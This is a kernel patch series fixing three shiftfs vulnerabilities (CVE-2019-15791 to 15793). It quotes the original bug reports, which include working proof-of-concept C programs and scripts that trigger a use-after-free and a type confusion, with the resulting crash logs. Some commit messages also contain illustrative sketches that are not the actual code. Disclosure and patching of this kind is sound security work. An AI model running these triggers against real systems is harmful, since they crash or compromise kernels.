+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 10:41:03 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
+ handling
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
+file from the lower filesystem without taking an additional
+reference to that file. After the btrfs ioctl completes this fd
+is closed, which then puts a reference to that file, leading to a
+refcount underflow. Original bug report and test case from Jann
+Horn is below.
+
+Fix this, and at the same time simplify the management of the fd
+to the lower file for the ioctl. In
+shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
+the lower file and set FDPUT_FPUT so that this reference will get
+dropped on fdput() in error paths. Do not maintain the struct fd
+in the caller, as it the fd installed in the fd table is
+sufficient to properly clean up. Finally, remove the fdput() in
+shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
+__close_fd() call.
+
+Original report from Jann Horn:
+
+In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
+
+ src = fdget(oldfd);
+ if (!src.file)
+  return -EINVAL;
+ // src holds one reference (assuming multithreaded execution)
+
+ ret = shiftfs_real_fdget(src.file, lfd);
+ // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
+ // extra references
+ fdput(src);
+ // this drops the only reference we were holding on src, and src was
+ // the only thing holding a reference to lfd->file. lfd->file may be
+ // dangling at this point.
+ if (ret)
+  return ret;
+
+ *newfd = get_unused_fd_flags(lfd->file->f_flags);
+ if (*newfd < 0) {
+  // always a no-op
+  fdput(*lfd);
+  return *newfd;
+ }
+
+ fd_install(*newfd, lfd->file);
+ // fd_install() consumes a counted reference, but we don't hold any
+ // counted references. so at this point, if lfd->file hasn't been freed
+ // yet, its refcount is one lower than it ought to be.
+
+ [...]
+
+ // the following code is refcount-neutral, so the refcount stays one too
+ // low.
+ if (ret)
+  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
+
+shiftfs_real_fdget() is implemented as follows:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+ struct shiftfs_file_info *file_info = file->private_data;
+ struct file *realfile = file_info->realfile;
+
+ lowerfd->flags = 0;
+ lowerfd->file = realfile;
+
+ /* Did the flags change since open? */
+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+  return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+ return 0;
+}
+
+Therefore, the following PoC will cause reference count overdecrements; I ran it
+with SLUB debugging enabled and got the following splat:
+
+=======================================
+user@ubuntu1910vm:~/shiftfs$ cat run.sh
+sync
+unshare -mUr ./run2.sh
+user@ubuntu1910vm:~/shiftfs$ cat run2.sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+touch mnt/tmpfs/foo
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
+
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <err.h>
+#include <linux/btrfs.h>
+
+int main(void) {
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = openat(root, "foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+  sleep(1);
+  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (map != MAP_FAILED) munmap(map, 0x1000);
+}
+user@ubuntu1910vm:~/shiftfs$ ./run.sh
+none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[ 183.463452] general protection fault: 0000 [#1] SMP PTI
+[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 183.510580] Call Trace:
+[ 183.511396] mmap_region+0x417/0x670
+[ 183.512592] do_mmap+0x3a8/0x580
+[ 183.513655] vm_mmap_pgoff+0xcb/0x120
+[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
+[ 183.516155] __x64_sys_mmap+0x33/0x40
+[ 183.517352] do_syscall_64+0x5a/0x130
+[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
+[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
+[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
+[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
+[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
+[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
+[ 183.560350] ---[ end trace 4a860910803657c2 ]---
+[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+=======================================
+
+Disassembly of surrounding code:
+
+55 push rbp
+4889E5 mov rbp,rsp
+4157 push r15
+4156 push r14
+4155 push r13
+4154 push r12
+488B87C8000000 mov rax,[rdi+0xc8]
+4C8B6810 mov r13,[rax+0x10]
+498B4528 mov rax,[r13+0x28]
+4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
+0F8497000000 jz near 0xcc
+4989FC mov r12,rdi
+4989F6 mov r14,rsi
+
+This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
+think this corresponds to the load of "realfile->f_op->mmap" in the source code.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15791
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 35 +++++++++++++++++++++--------------
+ 1 file changed, 21 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 0d6ce377b07c..9a6a7ad50b90 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
+ 	return false;
+ }
+ 
+-static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+-					  void __user *arg,
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args *v1,
+ 					  struct btrfs_ioctl_vol_args_v2 *v2)
+ {
+@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	fdput(lfd);
+ 	__close_fd(current->files, fd);
+ 	kfree(v1);
+ 	kfree(v2);
+@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args **b1,
+ 					  struct btrfs_ioctl_vol_args_v2 **b2,
+-					  struct fd *lfd,
+ 					  int *newfd)
+ {
+ 	int oldfd, ret;
+ 	struct fd src;
++	struct fd lfd = {};
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
+@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	if (!src.file)
+ 		return -EINVAL;
+ 
+-	ret = shiftfs_real_fdget(src.file, lfd);
+-	fdput(src);
+-	if (ret)
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
+ 		return ret;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
+ 
+-	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+-		fdput(*lfd);
++		fdput(lfd);
+ 		return *newfd;
+ 	}
+ 
+-	fd_install(*newfd, lfd->file);
++	fd_install(*newfd, lfd.file);
+ 
+ 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
+ 		v1->fd = *newfd;
+@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	}
+ 
+ 	if (ret)
+-		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
+ 
+ 	return ret;
+ }
+@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	int newfd = -EBADF;
+ 	long err = 0, ret = 0;
+ 	void __user *argp = (void __user *)arg;
+-	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
+ 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
+ 
+ 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
+-					     &btrfs_lfd, &newfd);
++					     &newfd);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	fdput(lowerfd);
+ 
+ out_restore:
+-	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
+ 					     btrfs_v1, btrfs_v2);
+ 	if (!ret)
+ 		ret = err;
+-- 
+2.39.2
+
+From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 1 Nov 2019 14:19:16 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Verify filesystem type in shiftfs_real_fdget().
+
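+One plausible shape for such a check (an illustration only, not the
+actual hunk) is to reject any file whose f_op does not belong to
+shiftfs before trusting file->private_data:
+
+ /* sketch: bail out unless the file really is a shiftfs file */
+ if (file->f_op != &shiftfs_file_operations &&
+     file->f_op != &shiftfs_dir_operations)
+ 	return -EINVAL;
+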
+Quoting Jann Horn:
+ #################### Bug 2: Type confusion ####################
+
+ shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
+ passes the resulting file* into shiftfs_real_fdget(), which does this:
+
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+  struct shiftfs_file_info *file_info = file->private_data;
+  struct file *realfile = file_info->realfile;
+
+  lowerfd->flags = 0;
+  lowerfd->file = realfile;
+
+  /* Did the flags change since open? */
+  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+   return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+  return 0;
+ }
+
+ file->private_data is a void* that points to a filesystem-dependent type; and
+ some filesystems even use it to store a type-cast number instead of a pointer.
+ The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
+
+ As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
+ (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
+ offset 0x10), and I use that to cause a memory dereference somewhere around
+ 0x4242:
+
+ =======================================
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
+ #!/bin/sh
+ sync
+ unshare -mUr ./run2.sh
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
+ #!/bin/sh
+ set -e
+
+ mkdir -p mnt/tmpfs
+ mkdir -p mnt/shiftfs
+ mount -t tmpfs none mnt/tmpfs
+ mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+ mount|grep shift
+ gcc -o ioctl ioctl.c -Wall
+ ./ioctl
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
+ #include <sys/ioctl.h>
+ #include <fcntl.h>
+ #include <err.h>
+ #include <unistd.h>
+ #include <linux/btrfs.h>
+ #include <sys/mman.h>
+
+ int main(void) {
+   // make our vmacache sequence number something like 0x4242
+   for (int i=0; i<0x4242; i++) {
+     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
+         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
+     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
+     munmap(x, 0x1000);
+   }
+
+   int root = open("mnt/shiftfs", O_RDONLY);
+   if (root == -1) err(1, "open shiftfs root");
+   int foofd = open("/proc/self/environ", O_RDONLY);
+   if (foofd == -1) err(1, "open foofd");
+   // trigger the confusion
+   struct btrfs_ioctl_vol_args iocarg = {
+     .fd = foofd
+   };
+   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+ }
+ user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
+ none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+ /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+ [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
+ [ 348.105060] #PF: supervisor read access in kernel mode
+ [ 348.106573] #PF: error_code(0x0000) - not-present page
+ [ 348.108102] PGD 0 P4D 0
+ [ 348.108871] Oops: 0000 [#1] SMP PTI
+ [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+ [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+ [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ [ 348.143545] Call Trace:
+ [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
+ [ 348.145562] do_vfs_ioctl+0x407/0x670
+ [ 348.146620] ? putname+0x4a/0x50
+ [ 348.147556] ksys_ioctl+0x67/0x90
+ [ 348.148514] __x64_sys_ioctl+0x1a/0x20
+ [ 348.149593] do_syscall_64+0x5a/0x130
+ [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+ [ 348.152108] RIP: 0033:0x7f77fa76767b
+ [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
+ [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
+ [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
+ [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
+ [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
+ [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
+ [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
+ [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
+ [ 348.188617] CR2: 0000000000004289
+ [ 348.189586] ---[ end trace dad859a1db86d660 ]---
+ [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ Killed
+ user@ubuntu1910vm:~/shiftfs_confuse$
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+[ saf: use f_op->open instead as special inodes in shiftfs sbs
+  will not use shiftfs open f_ops ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15792
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 33 +++++++++++++++++++--------------
+ 1 file changed, 19 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9a6a7ad50b90..897e0163005e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 	return 0;
+ }
+ 
+-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+-{
+-	struct file *realfile = file->private_data;
+-
+-	lowerfd->flags = 0;
+-	lowerfd->file = realfile;
+-
+-	/* Did the flags change since open? */
+-	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+-		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+-
+-	return 0;
+-}
+-
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+ 	struct file *realfile;
+@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
+ 	return flags;
+ }
+ 
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open &&
++	    file->f_op->open != shiftfs_dir_open)
++		return -EINVAL;
++
++	realfile = file->private_data;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
+ static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	struct file *file = iocb->ki_filp;
+-- 
+2.39.2
+
+From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 13:35:25 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
+ operations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Several locations that shift ids translate user/group ids into
+init_user_ns before performing operations in the lower filesystem,
+whereas they should translate them into the s_user_ns of the lower
+filesystem. This results in using ids other than the intended ones in
+the lower fs, which will likely not map into the shiftfs s_user_ns.
+
+Change these sites to use shift_k[ug]id() to do a translation
+into the s_user_ns of the lower filesystem.
+
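+As a hedged worked example (the linear-offset namespace model and all
+mapping numbers below are hypothetical, chosen only to illustrate the
+two-step translation):
+
+ #include <stdio.h>
+
+ /* toy model: each ns maps its local uid u to kernel-wide kuid base+u */
+ struct userns { unsigned long base; };
+
+ static long uid_from_kuid(struct userns *ns, unsigned long kuid)
+ { return (long)(kuid - ns->base); }            /* kuid -> ns-local uid */
+
+ static unsigned long kuid_in(struct userns *ns, unsigned long uid)
+ { return ns->base + uid; }                     /* ns-local uid -> kuid */
+
+ int main(void) {
+   struct userns shiftfs_ns = { .base = 100000 }; /* sb->s_user_ns */
+   struct userns lower_ns   = { .base = 200000 }; /* sbinfo->userns */
+   unsigned long fsuid = 100000;                  /* container root */
+
+   /* old code: map into init_user_ns, i.e. keep the raw uid 0 as the
+    * kuid -- that is host root, not mapped in the lower fs at all */
+   printf("old: kuid %ld\n", uid_from_kuid(&shiftfs_ns, fsuid));
+
+   /* shift_kuid(): unmap in the shiftfs ns, remap in the lower fs ns */
+   printf("new: kuid %lu\n",
+          kuid_in(&lower_ns, uid_from_kuid(&shiftfs_ns, fsuid)));
+   return 0;
+ }
+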
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15793
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
+ 1 file changed, 23 insertions(+), 20 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 897e0163005e..04fba4689eb6 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
+ 	put_cred(newcred);
+ }
+ 
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
+ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 					 const struct cred **oldcred,
+ 					 struct cred **newcred,
+ 					 struct dentry *dentry, umode_t mode,
+ 					 bool hardlink)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
